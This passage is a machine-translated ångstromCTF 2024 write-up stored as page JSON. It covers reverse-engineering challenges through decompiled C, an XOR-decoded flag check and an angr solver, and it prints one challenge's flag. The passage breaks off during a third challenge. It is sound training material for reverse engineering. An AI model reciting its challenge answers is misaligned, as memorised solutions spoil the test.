{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-angstrom-ctf-2024-en","result":{"data":{"markdownRemark":{"id":"c2f3bcaf-8939-5308-a004-30f543262f41","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-angstrom-ctf-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in ångstromCTF 2024 with the team 0nePadding.</p>\n<p>We finished at a clean 1000 points, placing 108th out of 923 teams.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 661px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/876f65ffad7a70fde9c3dcd513b236cf/0012b/image-20240602170849307.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABiElEQVQoz42SXUsbURCG94dIkhrzZTQJ+5HNh2HjZpOsQi/6F2JKL8ReFGls16gtYkMVvBGjIrVBQbDURa21/+7pJEjRpIIXD+85M8OZmTOjzLnXVOwrnMoVVWHO/SXna7LZi2dh6BfMlH7y6qVPPvcDRdda6KqHmlnBzLZJxJd4EWoSekAw2CQQfD3Q0JAvEFggkVgkX3hPNNpCKVsnzJbPqFXPKRZ6ZDIHpNP7ot1H6NreiK1POt3FMA5x3R66/g3FtnYkeEuc65JpVbJ4xGKrQ3hMJ1cG+tCeiHtEIx/QtE1s+yvJ5BeU0swumtphcnKNqalPErhGPD5KLLY+YsukPhKJtDHNDpa1LQV1+i1/xy6fUpk9wyr1UNWj+7a7/23xX6sDPSCV2qdYPMZxTuR+jKKpLYr5z5hGm0Jug6zhMRF+cz+MhSdoMh5sMB5qMDbWkEffSpXvCIeXUdz6LTXnFrd2R11w633+UHXuJMgnl/MHOkzevJQ18WUgvvzfDfPzv2WNfP4CvFA1FZc/xtYAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/876f65ffad7a70fde9c3dcd513b236cf/8ac56/image-20240602170849307.webp 240w,\n/static/876f65ffad7a70fde9c3dcd513b236cf/d3be9/image-20240602170849307.webp 480w,\n/static/876f65ffad7a70fde9c3dcd513b236cf/84ccf/image-20240602170849307.webp 661w\"\n              sizes=\"(max-width: 661px) 100vw, 661px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/876f65ffad7a70fde9c3dcd513b236cf/8ff5a/image-20240602170849307.png 240w,\n/static/876f65ffad7a70fde9c3dcd513b236cf/e85cb/image-20240602170849307.png 480w,\n/static/876f65ffad7a70fde9c3dcd513b236cf/0012b/image-20240602170849307.png 661w\"\n            sizes=\"(max-width: 661px) 100vw, 661px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/876f65ffad7a70fde9c3dcd513b236cf/0012b/image-20240602170849307.png\"\n            alt=\"image-20240602170849307\"\n            title=\"image-20240602170849307\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Up until now I had focused almost entirely on Rev challenges, but going forward I plan to gradually tackle Pwn and Web as well.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#guess-the-flagrev\">Guess the Flag(Rev)</a></li>\n<li><a href=\"#switcherrev\">switcher(Rev)</a></li>\n<li><a href=\"#polyominorev\">Polyomino(Rev)</a></li>\n<li><a href=\"#exampwn\">exam(Pwn)</a></li>\n<li><a href=\"#presidentialpwn\">presidential(Pwn)</a></li>\n<li><a href=\"#spinnerweb\">spinner(Web)</a></li>\n<li><a href=\"#markdownweb\">markdown(Web)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"guess-the-flagrev\" style=\"position:relative;\"><a href=\"#guess-the-flagrev\" aria-label=\"guess the flagrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Guess the Flag(Rev)</h2>\n<blockquote>\n<p>Do you have what it takes to guess the flag?</p>\n</blockquote>\n<p>Decompiling the challenge binary yields the following result.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token class-name\">int32_t</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">int32_t</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> argv<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> envp<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> fsbase<span class=\"token punctuation\">;</span>\n    <span class=\"token class-name\">int64_t</span> rax <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint64_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Go ahead, guess the flag: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">void</span> buf<span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> rbx <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">;</span>\n    <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0x3f</span><span class=\"token punctuation\">,</span> __TMC_END__<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span>true<span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>rbx <span class=\"token operator\">-</span> <span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        <span class=\"token punctuation\">{</span>\n            <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n        <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint8_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>rbx <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint8_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>rbx <span class=\"token operator\">^</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        rbx <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>rbx <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strcmp</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">,</span> <span class=\"token string\">\"`bugzbnllhuude^un^uid^md`ru^rhfo…\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Wrong. Not sure why you'd think …\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">else</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Correct! It was kinda obvious tb…\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint64_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rax <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint64_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token comment\">/* no return */</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>At a glance, it is clear that the flag is embedded XOR’d with 1.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/cc355bd918477f6620e6533371e4fd7a/7131f/image-20240525184353437.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABZklEQVQoz5WRaWsbMRCG9///n34toQbjFErwkcSJ3a6P3a73PrSS9n46dmggpVA64tE7jIbRjOT4voexlqZtsI2l7Vrcg8t6sxb9QZrnBGGGtgNNN2Fb4bd+8HvJqXFeTk8kKiSp30h1iBvseXY37L29FHwlOH+izL6gyxmmmqGKN61Fq3wm8TuMeqTvR5xtsuJYvuIW23dOasexeOF7tiXXLo1+xNQrdLUUf4lWS6yoEVWl+PUDjXW5mmNawzAN9GN30+m6phFVa5StKEzBMEDX3/Ll9CPvMdnGccAJSp/cpqi2INYXvOLApT7zszriVwfiIqAqKmqlaJtWaP5KI1j5C8cLz1zSQLrr8aXYfPeZb/78xkOwwM+OPO02+NFJLi0pTfYHuUyRUcs0Xdfh5CYm05F0mZCaiES6zGwkfiixGC+XH4/vWV0WrMIFm+Qrq+ietbAMrzHRaM5B3vw6u8O/bOK/7Bew+V+U0qVKsAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/cc355bd918477f6620e6533371e4fd7a/8ac56/image-20240525184353437.webp 240w,\n/static/cc355bd918477f6620e6533371e4fd7a/d3be9/image-20240525184353437.webp 480w,\n/static/cc355bd918477f6620e6533371e4fd7a/457aa/image-20240525184353437.webp 710w\"\n              sizes=\"(max-width: 710px) 100vw, 710px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/cc355bd918477f6620e6533371e4fd7a/8ff5a/image-20240525184353437.png 240w,\n/static/cc355bd918477f6620e6533371e4fd7a/e85cb/image-20240525184353437.png 480w,\n/static/cc355bd918477f6620e6533371e4fd7a/7131f/image-20240525184353437.png 710w\"\n            sizes=\"(max-width: 710px) 100vw, 710px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/cc355bd918477f6620e6533371e4fd7a/7131f/image-20240525184353437.png\"\n            alt=\"image-20240525184353437\"\n            title=\"image-20240525184353437\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"switcherrev\" style=\"position:relative;\"><a href=\"#switcherrev\" aria-label=\"switcherrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>switcher(Rev)</h2>\n<blockquote>\n<p>It’s incredible how completely indiscernible the functions are…</p>\n</blockquote>\n<p>Looking at the challenge binary, we can see it validates a password string obtained via <code class=\"language-text\">fgets</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 517px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0adaa58c9901d2a110c7664cb79cea09/fa2f5/image-20240526132723701.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 43.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABqElEQVQoz42R226bQBCGeZmaszmTAHZrzAIOjuNgwMRO1V5USpu0ahUpUq6qSu0b5CKv+2cWZJT4qhefZuewuzPzC9e7GlVdYb3do2m3+LhvUFcltlctNpsS+12DhvI8V1Yb7NoK7ZZqmho1xZbLc2I5IHieB8d14Xo+4cIn3+U+4ThOZ3mN53ud9f2e/uwPtQcEVZFgGyp0Xcd4bEBRFDqPYRkmHMuGQTFV0yBTXBRFSJI0cPDFV75w6lpYzE4wnU6wKFbIshyhfwLLsuDYDmFD03R6VO8uvRuNBvjnxwi2qWMWmCjSBDfXn/Dj8xc83Nwij2PkRQbLteFGEdzgFI5pIg4ixGGED9EEsizTI2pvVZpAog7n2QKr9SUuLi9Qbio83v3E8++/ePrzD7++3oGxBEWeYHXGcEXiPHz73n14TzZlaTcRYwxpniGmJoR5PENxXiA5W6Fcl9gRLdGUNVjCkKc5knmCyWSKcPqehPMGgiB4QxiGECxDo/ZJaZuWTzsYHRYvShiTUFwUTVX7GI3G469FOUbg88uy0ql4vGCe4xf7XSn/xQtCSi6S0EGAGQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0adaa58c9901d2a110c7664cb79cea09/8ac56/image-20240526132723701.webp 240w,\n/static/0adaa58c9901d2a110c7664cb79cea09/d3be9/image-20240526132723701.webp 480w,\n/static/0adaa58c9901d2a110c7664cb79cea09/7f59e/image-20240526132723701.webp 517w\"\n              sizes=\"(max-width: 517px) 100vw, 517px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0adaa58c9901d2a110c7664cb79cea09/8ff5a/image-20240526132723701.png 240w,\n/static/0adaa58c9901d2a110c7664cb79cea09/e85cb/image-20240526132723701.png 480w,\n/static/0adaa58c9901d2a110c7664cb79cea09/fa2f5/image-20240526132723701.png 517w\"\n            sizes=\"(max-width: 517px) 100vw, 517px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0adaa58c9901d2a110c7664cb79cea09/fa2f5/image-20240526132723701.png\"\n            alt=\"image-20240526132723701\"\n            title=\"image-20240526132723701\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Examining the function that performs this check reveals that it calls a series of functions, each comparing the flag one character at a time from the beginning.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 865px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/916c02254c27cd72a91a2e838b879ece/79e48/image-20240526132742407.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABdUlEQVQoz5WS2U7CQBSG5x0ULtiCXrC0nRUQaKFjqZZVJdG4RK9MfP9H+D0zpMZETfDiy5n1n3POP+zj9QXvz0/IFgvcbrZ4u39EUSxxXVwjz3NkWfYv2M1uhVWRIwgCCMGhRAgpOTiPwKVAv99Hv9c7xCNgIzuFiUcISVCRwHh8geF4AqWNfyAMwz8uBz66REq84P5ui92mAI+4F9RGQ5oB9GAIrRWiKPKiDjcuKddKsXLOlBGIeIBKpeI5PTlBvdFAs9lCq9VCu93G2fm5H1er1S9q9bqn4c82UXfzWg3MTEZQI+NLDt3LQkJIBakUOJXssuH8EL+X7Fqi6IwxBoMBVaQ1VSjB8uUVcjIlTS1Sa2GzxSFeWszTFEmSYDab/YTWk19gYzJlSKb0yEkehVDcuR0hCCljit1uF51O52jY7vEO6/0GSRzD2hTr1RKv+wcsrwrK8JBJTHvHwpLFHFMb09+Tvgea+jIkl11vlKJ+CvEvPgGmhTvI1XtDNAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/916c02254c27cd72a91a2e838b879ece/8ac56/image-20240526132742407.webp 240w,\n/static/916c02254c27cd72a91a2e838b879ece/d3be9/image-20240526132742407.webp 480w,\n/static/916c02254c27cd72a91a2e838b879ece/5d624/image-20240526132742407.webp 865w\"\n              sizes=\"(max-width: 865px) 100vw, 865px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/916c02254c27cd72a91a2e838b879ece/8ff5a/image-20240526132742407.png 240w,\n/static/916c02254c27cd72a91a2e838b879ece/e85cb/image-20240526132742407.png 480w,\n/static/916c02254c27cd72a91a2e838b879ece/79e48/image-20240526132742407.png 865w\"\n            sizes=\"(max-width: 865px) 100vw, 865px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/916c02254c27cd72a91a2e838b879ece/79e48/image-20240526132742407.png\"\n            alt=\"image-20240526132742407\"\n            title=\"image-20240526132742407\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This kind of challenge is trivially solved with angr, so I retrieved the flag using the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> angr\n\nproj <span class=\"token operator\">=</span> angr<span class=\"token punctuation\">.</span>Project<span class=\"token punctuation\">(</span><span class=\"token string\">\"switcher\"</span><span class=\"token punctuation\">,</span> auto_load_libs<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\nobj <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>loader<span class=\"token punctuation\">.</span>main_object\nfind <span class=\"token operator\">=</span> <span class=\"token number\">0x401219</span>\navoids <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0x40122c</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x4010f8</span><span class=\"token punctuation\">]</span>\ninit_state <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>factory<span class=\"token punctuation\">.</span>entry_state<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nsimgr <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>factory<span class=\"token punctuation\">.</span>simgr<span class=\"token punctuation\">(</span>init_state<span class=\"token punctuation\">)</span>\nsimgr<span class=\"token punctuation\">.</span>explore<span class=\"token punctuation\">(</span>find<span class=\"token operator\">=</span>find<span class=\"token punctuation\">,</span> avoid<span class=\"token operator\">=</span>avoids<span class=\"token punctuation\">)</span>\nsimgr<span class=\"token punctuation\">.</span>found<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>posix<span class=\"token punctuation\">.</span>dumps<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># actf{jumping_my_way_to_the_flag_one_by_one}</span></code></pre></div>\n<h2 id=\"polyominorev\" style=\"position:relative;\"><a href=\"#polyominorev\" aria-label=\"polyominorev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Polyomino(Rev)</h2>\n<blockquote>\n<p>I know this is a cybersecurity competition but I decided to throw in a math problem to level the field a little bit. You can solve it, right?</p>\n</blockquote>\n<p>Analyzing the challenge binary yields the following decompilation result.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token class-name\">int32_t</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">int32_t</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> argv<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> envp<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> fsbase\n    <span class=\"token class-name\">int64_t</span> rax <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">__printf_chk</span><span class=\"token punctuation\">(</span>flag<span class=\"token operator\">:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> format<span class=\"token operator\">:</span> <span class=\"token string\">\"I'm practicing my math skills. G…\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token class-name\">int32_t</span><span class=\"token operator\">*</span> var_80 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_40a0\n    <span class=\"token class-name\">int32_t</span><span class=\"token operator\">*</span> var_88 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_409c\n    <span class=\"token class-name\">int32_t</span><span class=\"token operator\">*</span> var_90 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4098\n    <span class=\"token class-name\">int32_t</span><span class=\"token operator\">*</span> var_98 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4094\n    <span class=\"token function\">__isoc99_scanf</span><span class=\"token punctuation\">(</span>format<span class=\"token operator\">:</span> <span class=\"token string\">\"%d %d %d %d %d %d %d %d %d\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4080<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4080<span class=\"token operator\">:</span><span class=\"token number\">4</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4088<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4088<span class=\"token operator\">:</span><span class=\"token number\">4</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4090<span class=\"token punctuation\">,</span> var_98<span class=\"token punctuation\">,</span> var_90<span class=\"token punctuation\">,</span> var_88<span class=\"token punctuation\">,</span> var_80<span class=\"token punctuation\">)</span>\n    <span class=\"token function\">__printf_chk</span><span class=\"token punctuation\">(</span>flag<span class=\"token operator\">:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> format<span class=\"token operator\">:</span> <span class=\"token string\">\"Hmm, let me think\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">fflush</span><span class=\"token punctuation\">(</span>fp<span class=\"token operator\">:</span> <span class=\"token constant\">stdout</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">usleep</span><span class=\"token punctuation\">(</span>useconds<span class=\"token operator\">:</span> <span class=\"token number\">0x493e0</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span>c<span class=\"token operator\">:</span> <span class=\"token number\">0x2e</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">fflush</span><span class=\"token punctuation\">(</span>fp<span class=\"token operator\">:</span> <span class=\"token constant\">stdout</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">usleep</span><span class=\"token punctuation\">(</span>useconds<span class=\"token operator\">:</span> <span class=\"token number\">0x493e0</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span>c<span class=\"token operator\">:</span> <span class=\"token number\">0x2e</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">fflush</span><span class=\"token punctuation\">(</span>fp<span class=\"token operator\">:</span> <span class=\"token constant\">stdout</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">usleep</span><span class=\"token punctuation\">(</span>useconds<span class=\"token operator\">:</span> <span class=\"token number\">0x493e0</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>str<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>data_2098<span class=\"token punctuation\">)</span>\n    <span class=\"token function\">usleep</span><span class=\"token punctuation\">(</span>useconds<span class=\"token operator\">:</span> <span class=\"token number\">0x7a120</span><span class=\"token punctuation\">)</span>\n    <span class=\"token 